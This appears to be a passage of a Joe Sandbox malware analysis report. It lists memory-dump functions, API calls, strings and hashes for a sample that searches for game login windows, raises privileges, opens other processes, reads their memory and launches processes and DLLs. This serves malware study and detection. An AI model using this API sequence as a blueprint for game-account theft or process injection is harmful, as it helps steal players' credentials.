                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 076c24c519daf6482dedd47ce3782b95a7ab99eb4c5a95a4068a98e1634fb417
                                                                                  • Instruction ID: c0b9b6030036a827ce05d73ad0b4aa433ed33c10641119d41ef9a104bc372c91
                                                                                  • Opcode Fuzzy Hash: 076c24c519daf6482dedd47ce3782b95a7ab99eb4c5a95a4068a98e1634fb417
                                                                                  • Instruction Fuzzy Hash: 30D01271244B097BEA110B058C22F62BA5DE70AF94F525051BE0567B80D1B47C1084A9
                                                                                  Function 0BE9787E Relevance: .0, Instructions: 2COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d154017184f2bfeeeab58fe702d8419e248df75aaa8ce635ef09361d606bf668
                                                                                  • Instruction ID: c89201e386d5be5b89597dbb1aff041b429c7eb12c3b061d7b0c1ce45b4e2932
                                                                                  • Opcode Fuzzy Hash: d154017184f2bfeeeab58fe702d8419e248df75aaa8ce635ef09361d606bf668
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 0BE972BE Relevance: .0, Instructions: 2COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 99a67e4e97cbf9041f97408c73e16dc18e2669854f854dcf71525dd04a603268
                                                                                  • Instruction ID: d9aad7a3527938fd09e0f72200b9691c5e38178e87bc19561ca499fdcb986820
                                                                                  • Opcode Fuzzy Hash: 99a67e4e97cbf9041f97408c73e16dc18e2669854f854dcf71525dd04a603268
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 0BE9773E Relevance: .0, Instructions: 2COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0412acec26c310c083a4cb69f4e1fae75638401f35507ad8f8a8ea94c68ff879
                                                                                  • Instruction ID: 27d61bba9070d747fb1c00dca4c3529d92ac5ab2994ef18a576262ff51600e6a
                                                                                  • Opcode Fuzzy Hash: 0412acec26c310c083a4cb69f4e1fae75638401f35507ad8f8a8ea94c68ff879
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 6A6DA610 Relevance: 86.1, APIs: 28, Strings: 21, Instructions: 358windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(00000000), ref: 6A6DA633
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DA66F
                                                                                  • OutputDebugStringA.KERNEL32(_strnicmp : WTWindow login window), ref: 6A6DA68D
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DA694
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DA6F7
                                                                                  • FindWindowExA.USER32(00000000,00000000,TTreeView,00000000), ref: 6A6DA72E
                                                                                  • FindWindowExA.USER32(00000000,00000000,TfrmGameList,00000000), ref: 6A6DA740
                                                                                  • FindWindowExA.USER32(00000000,00000000,SysTreeView32,00000000), ref: 6A6DA752
                                                                                  • FindWindowExA.USER32(00000000,00000000,TRzBmpButton,00000000), ref: 6A6DA764
                                                                                  • FindWindowExA.USER32(00000000,00000000,TRzTreeView,00000000), ref: 6A6DA776
                                                                                  • FindWindowExA.USER32(00000000,00000000,TVirtualStringTree,00000000), ref: 6A6DA788
                                                                                  • FindWindowExA.USER32(00000000,00000000,ComboBox,00000000), ref: 6A6DA79A
                                                                                  • FindWindowExA.USER32(00000000,00000000,TComboBox,00000000), ref: 6A6DA7AC
                                                                                  • FindWindowExA.USER32(00000000,00000000,_EL_Label,00000000), ref: 6A6DA7BE
                                                                                  • FindWindowExA.USER32(00000000,00000000,TfrmRegister,00000000), ref: 6A6DA7D0
                                                                                  • FindWindowExA.USER32(00000000,00000000,Internet Explorer_Server,00000000), ref: 6A6DA7E2
                                                                                  • FindWindowExA.USER32(00000000,00000000,_EL_RgnButton,00000000), ref: 6A6DA7F4
                                                                                  • FindWindowExA.USER32(00000000,00000000,Internet Explorer_Hidden,00000000), ref: 6A6DA806
                                                                                  • FindWindowExA.USER32(00000000,00000000,TForm_LoginBK,00000000), ref: 6A6DA818
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Find$DebugOutputString__wfopen_s$Visible
                                                                                  • String ID: C:\pl.txt$ComboBox$FindWindowEx : login window$Internet Explorer_Hidden$Internet Explorer_Server$IsPorcWithTargetClass : login window$SysTreeView32$TComboBox$TForm_LoginBK$TFrmMain$TRzBmpButton$TRzCheckBox$TRzTreeView$TTreeView$TVirtualStringTree$TfrmGameList$TfrmRegister$_EL_Label$_EL_RgnButton$_strnicmp : WTWindow login window$count is : %d
                                                                                  • API String ID: 1517189602-266419103
                                                                                  • Opcode ID: 0774dbf643602a83943663a296c586f98ab91941acb3522769610af69c12acfa
                                                                                  • Instruction ID: 33e13b70075b9bab99fb72c3a64cd0d09ee7e4e962f879f385c94e7620f64f67
                                                                                  • Opcode Fuzzy Hash: 0774dbf643602a83943663a296c586f98ab91941acb3522769610af69c12acfa
                                                                                  • Instruction Fuzzy Hash: 21A1B5A1A0C206BAE30067E15E44F7B76FD9BA168DF090538FD44E6152FF24F90846A7
                                                                                  Function 6A6D2A20 Relevance: 79.2, APIs: 32, Strings: 13, Instructions: 401COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D2A49
                                                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 6A6D2A5E
                                                                                  • wsprintfA.USER32 ref: 6A6D2A7F
                                                                                  • GetTickCount.KERNEL32 ref: 6A6D2A8B
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 6A6D2A98
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D2AE8
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6D2AFC
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D2B03
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D2B1B
                                                                                  • OutputDebugStringA.KERNEL32(shout is empty), ref: 6A6D2B2F
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D2B36
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$Current__wfopen_s$CountDirectoryProcessTick_memsetwsprintf
                                                                                  • String ID: %s\$%s_MAP_89826$(sj$(sj$C:\789.txt$C:\Users\user\Desktop\CFA702\D2EDCA7E\A806AE3\9683JE76z.dll$C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dll$C:\Users\user\Desktop\CFA702\D2EDCA7E\CF3651B9$C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dll$C:\pl.txt$CreateProcessmapWq: GamesType : %d, engineType : %d$shout is empty${4872-11202-91}
                                                                                  • API String ID: 1111341681-4138625294
                                                                                  • Opcode ID: 5b34dafec23bf56a7a0eec40a2a82d86f717ad5729c6bcb6262111f4c359093e
                                                                                  • Instruction ID: b8729abc1b9dd521b94334cd9425fb119477d24e769d243f09d4ada0ed3391b0
                                                                                  • Opcode Fuzzy Hash: 5b34dafec23bf56a7a0eec40a2a82d86f717ad5729c6bcb6262111f4c359093e
                                                                                  • Instruction Fuzzy Hash: 2AD1F3B1408341ABE320DB74CD98EEB73FAAF85344F098958F58487252EF75D60D8792
                                                                                  Function 6A6D9170 Relevance: 52.9, APIs: 10, Strings: 20, Instructions: 413COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D91EC
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004D02EC,?,00000011,00000000), ref: 6A6D9272
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004CE894,?,00000011,00000000), ref: 6A6D92F3
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004D0064,?,00000011,00000000), ref: 6A6D9374
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004CE730,?,00000011,00000000), ref: 6A6D93FC
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004C95FE,?,00000015,00000000), ref: 6A6D9489
                                                                                  • ReadProcessMemory.KERNEL32(00000000,0050197C,?,00000011,00000000), ref: 6A6D952C
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004CE744,?,0000000E,00000000), ref: 6A6D95C4
                                                                                  • ReadProcessMemory.KERNEL32(00000000,0072988C,?,00000012,00000000), ref: 6A6D9658
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D96F1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$Process$Read$Virtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilege
                                                                                  • String ID: .$.$1$8$8$a$a$a$c$c$d$h$i$m$m$m$n$o$o$r
                                                                                  • API String ID: 1302054802-2385272561
                                                                                  • Opcode ID: efeeb8dce094bce27c24c29811162ce71e9cbd88984225ca2e17dcc77d3b6b5f
                                                                                  • Instruction ID: 6801b8a30202de5f42cbe7e984f6acedee40c2f57ab763ab6a0fb25e5e9950d6
                                                                                  • Opcode Fuzzy Hash: efeeb8dce094bce27c24c29811162ce71e9cbd88984225ca2e17dcc77d3b6b5f
                                                                                  • Instruction Fuzzy Hash: C502682210C3C18DE302DA28C45875FBFD65BA674CF48099DE1C56B293C6AAD64DC7BB
                                                                                  Function 6A6D11A0 Relevance: 52.8, APIs: 26, Strings: 4, Instructions: 298sleepprocessCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 6A6D11D9
                                                                                    • Part of subcall function 6A6E00F0: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,?,6A6D11E6), ref: 6A6E00FE
                                                                                    • Part of subcall function 6A6E00F0: LookupPrivilegeValueA.ADVAPI32 ref: 6A6E0124
                                                                                    • Part of subcall function 6A6E00F0: CloseHandle.KERNEL32(?), ref: 6A6E0133
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D11F9
                                                                                  • OutputDebugStringA.KERNEL32(updebug(GetCurrentProcess())==FALSE), ref: 6A6D120C
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D1217
                                                                                  • Sleep.KERNEL32(0000000A), ref: 6A6D122C
                                                                                  • _memset.LIBCMT ref: 6A6D1244
                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 6A6D1270
                                                                                  • CloseHandle.KERNEL32(?), ref: 6A6D1289
                                                                                  • CloseHandle.KERNEL32(?), ref: 6A6D1290
                                                                                  • _memset.LIBCMT ref: 6A6D12DC
                                                                                  • ShellExecuteExA.SHELL32 ref: 6A6D131D
                                                                                  • _memset.LIBCMT ref: 6A6D1334
                                                                                  • _memset.LIBCMT ref: 6A6D1359
                                                                                  • _strrchr.LIBCMT ref: 6A6D1374
                                                                                  • _strncpy.LIBCMT ref: 6A6D1393
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D13AA
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6D13C3
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D13CA
                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6A6D13F5
                                                                                  • _memset.LIBCMT ref: 6A6D140A
                                                                                  • CloseHandle.KERNEL32(?), ref: 6A6D142C
                                                                                  • CloseHandle.KERNEL32(?), ref: 6A6D1433
                                                                                  • Sleep.KERNEL32(0000000A), ref: 6A6D1454
                                                                                  • _malloc.LIBCMT ref: 6A6D146B
                                                                                  • _memset.LIBCMT ref: 6A6D1482
                                                                                  • _strncpy.LIBCMT ref: 6A6D14EF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseHandle$DebugOutputProcessString$CreateSleep__wfopen_s_strncpy$CurrentExecuteLookupOpenPrivilegeShellTokenValue_malloc_strrchr
                                                                                  • String ID: <$@$C:\pl.txt$updebug(GetCurrentProcess())==FALSE
                                                                                  • API String ID: 1005001699-4193612860
                                                                                  • Opcode ID: c525f07de20324e0086fa980b921e14bd09f899dd9f98fb7717608a32213f5dd
                                                                                  • Instruction ID: 4ff69bd8219ebc73d12704c382b1a8d96b2f235a73bf5f6546a5a75fc3fffd7c
                                                                                  • Opcode Fuzzy Hash: c525f07de20324e0086fa980b921e14bd09f899dd9f98fb7717608a32213f5dd
                                                                                  • Instruction Fuzzy Hash: 7EA1A1B1908340ABD710DF65CD89A9BBBF8BBC9344F05492DF949D7241EB719908CBA2
                                                                                  Function 6A6D3900 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 199windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D392D
                                                                                  • OutputDebugStringA.KERNEL32(in RemoteGameDllZs), ref: 6A6D3947
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D394E
                                                                                  • _memset.LIBCMT ref: 6A6D396E
                                                                                  • _strncpy.LIBCMT ref: 6A6D39C0
                                                                                  • _strncpy.LIBCMT ref: 6A6D39F0
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D3A04
                                                                                  • OutputDebugStringA.KERNEL32(996 type;path is:), ref: 6A6D3A18
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3A1F
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D3A3D
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6D3A51
